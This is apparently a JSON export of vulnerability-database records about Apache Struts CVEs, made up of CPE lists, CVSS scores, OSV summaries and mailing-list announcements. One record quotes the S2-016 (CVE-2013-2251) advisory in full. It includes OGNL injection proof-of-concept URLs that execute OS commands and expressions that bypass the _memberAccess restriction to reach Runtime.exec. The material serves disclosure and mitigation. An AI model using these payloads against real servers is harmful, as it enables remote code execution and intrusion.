["cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.0.12", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.11.1", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.4", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.1.5", "cpe:/a:apache:struts:2.0.10", "cpe:/a:apache:struts:2.2.1.1", "cpe:/a:apache:struts:2.1.2", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.14", "cpe:/a:opensymphony:xwork:*", "cpe:/a:apache:struts:2.0.6", "cpe:/a:apache:struts:2.1.8", "cpe:/a:opensymphony:webwork:*", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.0", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.1.6", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.11.2"], "id": "CVE-2011-1772", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1772", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:xwork:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:opensymphony:webwork:*:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.1.4:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "description": "\r\n\r\nCVE Number: CVE-2013-2251\r\nTitle: Struts2 Prefixed Parameters OGNL Injection Vulnerability\r\nAffected Software: Apache Struts v2.0.0 - 2.3.15\r\nCredit: Takeshi Terada of Mitsui Bussan Secure Directions, Inc.\r\nIssue Status: v2.3.15.1 was released which fixes this vulnerability\r\nIssue ID by Vender: S2-016\r\n\r\nOverview:\r\n Struts2 is an open-source web application framework for Java.\r\n Struts2 (v2.0.0 - 2.3.15) is vulnerable to remote OGNL injection which\r\n leads to arbitrary Java method execution on the target server. This is\r\n caused by insecure handling of prefixed special parameters (action:,\r\n redirect: and redirectAction:) in DefaultActionMapper class of Struts2.\r\n\r\nDetails:\r\n <About DefaultActionMapper>\r\n\r\n Struts2's ActionMapper is a mechanism for mapping between incoming HTTP\r\n request and action to be executed on the server. DefaultActionMapper is\r\n a default implementation of ActionMapper. It handles four types of\r\n prefixed parameters: action:, redirect:, redirectAction: and method:.\r\n\r\n For example, redirect prefix is used for HTTP redirect.\r\n\r\n Normal redirect prefix usage in JSP:\r\n <s:form action="foo">\r\n ...\r\n <s:submit value="Register"/>\r\n <s:submit name="redirect:http://www.google.com/" value="Cancel"/>\r\n </s:form>\r\n\r\n If the cancel button is clicked, redirection is performed.\r\n\r\n Request URI for redirection:\r\n /foo.action?redirect:http://www.google.com/\r\n\r\n Resopnse Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/\r\n\r\n Usage of other prefixed parameters is similar to redirect.\r\n See Struts2 document for details.\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n <How the Attack Works>\r\n\r\n As stated already, there are four types of prefixed parameters.\r\n\r\n action:, redirect:, redirectAction:, method:\r\n\r\n All except for method: can be used for attacks. But regarding action:,\r\n it can be used only if wildcard mapping is enabled in configuration.\r\n On the one hand, redirect: and redirectAction: are not constrained by\r\n configuration (thus they are convenient for attackers).\r\n\r\n One thing that should be noted is that prefixed parameters are quite\r\n forceful. It means that behavior of application which is not intended\r\n to accept prefixed parameters can also be overwritten by prefixed\r\n parameters added to HTTP request. Therefore all Struts2 applications\r\n that use DefaultActionMapper are vulnerable to the attack.\r\n\r\n The injection point is name of prefixed parameters.\r\n Example of attack using redirect: is shown below.\r\n\r\n Attack URI:\r\n /bar.action?redirect:http://www.google.com/%25{1000-1}\r\n\r\n Response Header:\r\n HTTP/1.1 302 Found\r\n Location: http://www.google.com/999\r\n\r\n As you can see, expression (1000-1) is evaluated and the result (999)\r\n is appeared in Location response header. As I shall explain later,\r\n more complex attacks such as OS command execution is possible too.\r\n\r\n In DefaultActionMapper, name of prefixed parameter is once stored as\r\n ActionMapping object and is later executed as OGNL expression.\r\n Rough method call flow in execution phase is as the following.\r\n\r\n org.apache.struts2.dispatcher.ng.filter.StrutsExecuteFilter.doFilter()\r\n org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction()\r\n org.apache.struts2.dispatcher.Dispatcher.serviceAction()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.execute()\r\n org.apache.struts2.dispatcher.StrutsResultSupport.conditionalParse()\r\n com.opensymphony.xwork2.util.TextParseUtil.translateVariables()\r\n com.opensymphony.xwork2.util.OgnlTextParser.evaluate()\r\n\r\nProof of Concept:\r\n <PoC URLs>\r\n\r\n PoC is already disclosed on vender's web page.\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n\r\n Below PoC URLs are just quotes from the vender's page.\r\n\r\n Simple Expression:\r\n http://host/struts2-blank/example/X.action?action:%25{3*4}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}\r\n\r\n OS Command Execution:\r\n http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}\r\n\r\n Obviously such attacks are not specific to blank/showcase application,\r\n but all Struts2 based applications may be subject to attacks.\r\n\r\n <OS Command Execution and Static Method Call>\r\n\r\n Another topic that I think worth mentioning is that PoC URLs use\r\n ProcessBuilder class to execute OS commands. The merit of using this\r\n class is that it does not require static method to execute OS commands,\r\n while Runtime class does require it.\r\n\r\n As you may know, static method call in OGNL is basically prohibited.\r\n But in Struts2 <= v2.3.14.1 this restriction was easily bypassed by\r\n a simple trick:\r\n\r\n %{#_memberAccess['allowStaticMethodAccess']=true,\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n In Struts v2.3.14.2, SecurityMemberAccess class has been changed to\r\n prevent the trick. However there are still some techniques to call\r\n static method in OGNL.\r\n\r\n One technique is to use reflection to replace static method call to\r\n instance method call. Another technique is to overwrite #_memberAccess\r\n object itself rather than property of the object:\r\n\r\n %{#_memberAccess=new com.opensymphony.xwork2.ognl.SecurityMemberAccess(true),\r\n @java.lang.Runtime@getRuntime().exec('your commands')}\r\n\r\n Probably prevention against static method is just an additional layer\r\n of defense, but I think that global objects such as #_memberAccess\r\n should be protected from rogue update.\r\n\r\nTimeline:\r\n 2013/06/24 Reported to Struts Security ML\r\n 2013/07/17 Vender announced v2.3.15.1\r\n 2013/08/10 Disclosure of this advisory\r\n\r\nRecommendation:\r\n Immediate upgrade to the latest version is strongly recommended as\r\n active attacks have already been observed. It should be noted that\r\n redirect: and redirectAction: parameters were completely dropped and\r\n do not work in the latest version as stated in the vender's page.\r\n Thus attention for compatibility issues is required for upgrade.\r\n\r\n If you cannot upgrade your Struts2 immediately, filtering (by custom\r\n servlet filter, IPS, WAF and so on) can be a mitigation solution for\r\n this vulnerability. Some points about filtering solution are listed\r\n below.\r\n\r\n - Both %{expr} and ${expr} notation can be used for attacks.\r\n - Parameters both in querystring and in request body can be used.\r\n - redirect: and redirectAction: can be used not only for Java method\r\n execution but also for open redirect.\r\n\r\n See S2-017 (CVE-2013-2248) for open redirect issue.\r\n https://struts.apache.org/release/2.3.x/docs/s2-017.html\r\n\r\nReference:\r\n https://struts.apache.org/release/2.3.x/docs/s2-016.html\r\n https://cwiki.apache.org/confluence/display/WW/ActionMapper\r\n\r\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "securityvulns", "title": "Struts2 Prefixed Parameters OGNL Injection Vulnerability", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2013-2248", "CVE-2013-2251"], "modified": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29766", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29766", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nAs confirmed in our last announcement, the Apache Struts 1 framework in\r\nall versions is affected by a ClassLoader manipulation vulnerability\r\n(CVE-2014-0114) similar to a recently fixed vulnerability in Struts 2\r\n(CVE-2014-0112, CVE-2014-0094) [1].\r\n\r\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\r\nApache Struts project team can recommend a first mitigation that is\r\nrelatively simple to apply. It involves the introduction of a generic\r\nServlet filter, adding the possibility to blacklist unacceptable request\r\nparameters based on regular expressions. Please see the corresponding HP\r\nFortify blog entry [2] for detailed instructions.\r\n\r\nThe HP Fortify team also informed us that the vulnerability may be\r\nexploited for Remote Code Execution (RCE) in certain environments. Based\r\non this information, the Apache Struts project team recommends to apply\r\nthe mitigation advice *immediately* for all Struts 1 based applications.\r\n\r\nStruts 1 has had its End-Of-Life announcement more than one year ago\r\n[3]. However, in a cross project effort the Struts team is looking for a\r\ncorrection or an improved mitigation path. Please stay tuned for further\r\ninformation regarding a solution.\r\n\r\nThis is a cross-list posting. If you have questions regarding this\r\nreport, please direct them to security@struts.apache.org only.\r\n\r\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\r\n[2]\r\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\r\n[3] http://struts.apache.org/struts1eol-announcement.html\r\n\r\n-- Rene Gielen http://twitter.com/rgielen\r\n\r\n", "cvss3": {}, "published": "2014-05-02T00:00:00", "type": "securityvulns", "title": "[ANN][SECURITY] Struts 1 - CVE-2014-0114 -Mitigation Advice Available, Possible RCE Impact", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30529", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30529", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T19:13:33", "description": "Few ClassLoader manipulation vulnerabilities with potential RCE impact.", "cvss3": {}, "published": "2014-05-07T00:00:00", "type": "securityvulns", "title": "Apache Struts multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-07T00:00:00", "id": "SECURITYVULNS:VULN:13701", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13701", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\nThe Apache Struts project team confirms that Struts 1 in all versions is\r\naffected by a ClassLoader manipulation vulnerability similar to a\r\nrecently fixed vulnerability in Struts 2 (CVE-2014-0112, CVE-2014-0094) [1].\r\n\r\nThis is a different underlying flaw. For future reference, please use\r\nCVE-2014-0114 in regards to this issue.\r\n\r\nStruts 1 has had its End-Of-Life announcement one year ago. In a cross\r\nproject effort, the Struts team is looking for a correction or\r\nmitigation path though. Please stay tuned for further information\r\nregarding a solution.\r\n\r\nThis is a cross-list posting. If you have questions regarding this\r\nreport, please direct them to security@struts.apache.org only.\r\n\r\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\r\n\r\n-- Rene Gielen http://twitter.com/rgielen\r\n\r\n", "cvss3": {}, "published": "2014-05-02T00:00:00", "type": "securityvulns", "title": "[ANN][SECURITY] ClassLoader manipulation issue confirmed for Struts 1 - CVE-2014-0114", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114", "CVE-2014-0094", "CVE-2014-0112"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30528", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30528", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:50:46", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "cvss3": {}, "published": "2011-05-11T00:00:00", "type": "securityvulns", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2011-1772"], "modified": "2011-05-11T00:00:00", "id": "SECURITYVULNS:VULN:11662", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11662", "sourceData": "", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "osv": [{"lastseen": "2023-08-16T09:50:50", "description": "Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135.", "cvss3": {}, "published": "2022-05-14T01:57:02", "type": "osv", "title": "Arbitrary code execution in Apache Struts 2", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2134", "CVE-2013-2135"], "modified": "2023-08-16T09:48:09", "id": "OSV:GHSA-GQQM-564F-VVXQ", "href": "https://osv.dev/vulnerability/GHSA-gqqm-564f-vvxq", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-04-11T01:47:05", "description": "CookieInterceptor in Apache Struts 2.x before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and modify session state via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0113.", "cvss3": {}, "published": "2022-05-14T00:54:14", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0113", "CVE-2014-0116"], "modified": "2023-04-11T01:47:01", "id": "OSV:GHSA-HMHQ-382Q-MP56", "href": "https://osv.dev/vulnerability/GHSA-hmhq-382q-mp56", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:45:53", "description": "ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:16", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0112"], "modified": "2023-04-11T01:45:46", "id": "OSV:GHSA-PRJV-JJ26-WF8H", "href": "https://osv.dev/vulnerability/GHSA-prjv-jj26-wf8h", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:40:21", "description": "CookieInterceptor in Apache Struts before 2.3.20, when a wildcard cookiesName value is used, does not properly restrict access to the getClass method, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094.", "cvss3": {}, "published": "2022-05-14T00:54:15", "type": "osv", "title": "ClassLoader manipulation in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0094", "CVE-2014-0113"], "modified": "2023-04-11T01:40:18", "id": "OSV:GHSA-3C5C-XRQ4-QHR8", "href": "https://osv.dev/vulnerability/GHSA-3c5c-xrq4-qhr8", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-11T01:42:59", "description": "When the Struts2 debug mode is turned on, under certain conditions an arbitrary script may be executed in the 'Problem Report' screen. Also if JSP files are exposed to be accessed directly it's possible to execute an arbitrary script. \n\nIt is generally not advisable to have debug mode switched on outside of the development environment. Debug mode should always be turned off in production setup. Also never expose JSPs files directly and hide them inside WEB-INF folder or define dedicated security constraints to block access to raw JSP files.\n\nStruts >= 2.3.20 is not vulnerable to this attack. We recommend upgrading to Struts 2.3.20 or higher.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2022-05-14T01:57:02", "type": "osv", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5169"], "modified": "2023-04-11T01:42:56", "id": "OSV:GHSA-VWHV-J36G-5RM8", "href": "https://osv.dev/vulnerability/GHSA-vwhv-j36g-5rm8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-11T01:44:01", "description": "In Apache Struts 2.0.1 through 2.3.33 and 2.5 through 2.5.10, using an unintentional expression in a Freemarker tag instead of string literals can lead to a RCE attack.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T19:35:40", "type": "osv", "title": "Apache Struts 2.0.1 uses an unintentional expression in a Freemarker tag instead of string literal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611"], "modified": "2023-04-11T01:43:58", "id": "OSV:GHSA-8FX9-5HX8-CRHM", "href": "https://osv.dev/vulnerability/GHSA-8fx9-5hx8-crhm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-07T23:31:14", "description": "Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.", "cvss3": {}, "published": "2022-05-14T02:50:59", "type": "osv", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-7809"], "modified": "2023-08-07T23:30:50", "id": "OSV:GHSA-H4V9-JF2R-9H6M", "href": "https://osv.dev/vulnerability/GHSA-h4v9-jf2r-9h6m", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-14T23:09:04", "description": "The token check mechanism in Apache Struts 2.0.0 through 2.3.4 does not properly validate the token name configuration parameter, which allows remote attackers to perform cross-site request forgery (CSRF) attacks by setting the token name configuration parameter to a session attribute.", "cvss3": {}, "published": "2022-05-17T01:42:17", "type": "osv", "title": "Cross-Site Request Forgery in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-4386"], "modified": "2023-08-14T23:01:17", "id": "OSV:GHSA-2RVH-Q539-Q33V", "href": "https://osv.dev/vulnerability/GHSA-2rvh-q539-q33v", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-15T20:18:47", "description": "The Struts 2 action mapping mechanism supports the special parameter prefix action: which is intended to help with attaching navigational information to buttons within forms, under certain conditions this can be used to bypass security constraints. \n\nIn Struts 2.3.15.3 the action mapping mechanism was changed to avoid circumventing security constraints. Two additional constants were introduced to steer behaviour of DefaultActionMapper:\n\n- struts.mapper.action.prefix.enabled - when set to false support for \"action:\" prefix is disabled, set to false by default\n- struts.mapper.action.prefix.crossNamespaces - when set to false, actions defined with \"action:\" prefix must be in the same namespace as current action\n\n", "cvss3": {}, "published": "2022-05-17T04:44:52", "type": "osv", "title": "Apache Struts2 Broken Access Control Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4310"], "modified": "2023-08-15T19:19:17", "id": "OSV:GHSA-Q5Q8-JGHF-3PM3", "href": "https://osv.dev/vulnerability/GHSA-q5q8-jghf-3pm3", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-04-11T01:22:02", "description": "Multiple Cross-Site Scripting (XSS) in XWork generated error pages in Apache Struts. By default, XWork doesn't escape action's names in automatically generated error page, allowing for a successful XSS attack. When Dynamic Method Invocation (DMI) is enabled, the action name is generated dynamically base on request parameters. This allows to call non-existing page and method to produce error page with injected code as below. As of Struts 2.2.3 the action names are escaped when automatically generated error pages are rendered.", "cvss3": {}, "published": "2022-05-17T05:35:28", "type": "osv", "title": "Cross-site Scripting in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1772"], "modified": "2023-04-11T01:21:58", "id": "OSV:GHSA-56F8-G68R-J699", "href": "https://osv.dev/vulnerability/GHSA-56f8-g68r-j699", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-04-11T01:48:48", "description": "ValueStack defines special top object which represents root of execution context. It can be used to manipulate Struts' internals or can be used to affect container's settings. Applying better regex which includes pattern to exclude request parameters trying to use top object. This issue was patched in Struts 2.3.24.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-14T03:15:08", "type": "osv", "title": "Special top object can be used to access Struts' internals", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, 